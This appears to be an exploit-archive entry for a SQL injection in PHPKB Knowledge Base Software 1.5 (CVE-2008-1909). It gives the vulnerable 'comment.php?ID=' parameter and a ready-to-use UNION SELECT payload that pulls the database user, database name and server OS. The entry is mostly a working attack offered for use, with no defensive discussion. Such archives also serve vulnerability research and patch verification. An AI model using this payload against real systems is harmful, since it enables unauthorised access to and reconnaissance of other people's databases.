EXPLOITS

PHPKB Knowledge Base Software 1.5 - 'ID' SQL Injection

Author: parad0x
type: webapps
platform: php
port: 
date_added: 2008-04-10  
date_updated: 2016-11-21  
verified: 1  
codes: OSVDB-44344;CVE-2008-1909  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5428.txt  

PHPKB Knowledge Base Software (comment.php) Sql Injection Vulnerability
-------------------------------------------------------------------------------------------------
# Author  : parad0x
# Home   : www.inso.host.sk
# Script  : PHPKB Knowledge Base Software
# Script Homepage : http://www.knowledgebase-script.com
 -------------------------------------------------------------------------------------------------
http://[target]/comment.php?ID=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),database(),char(32),@@version_compile_os)/*
-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------

# milw0rm.com [2008-04-11]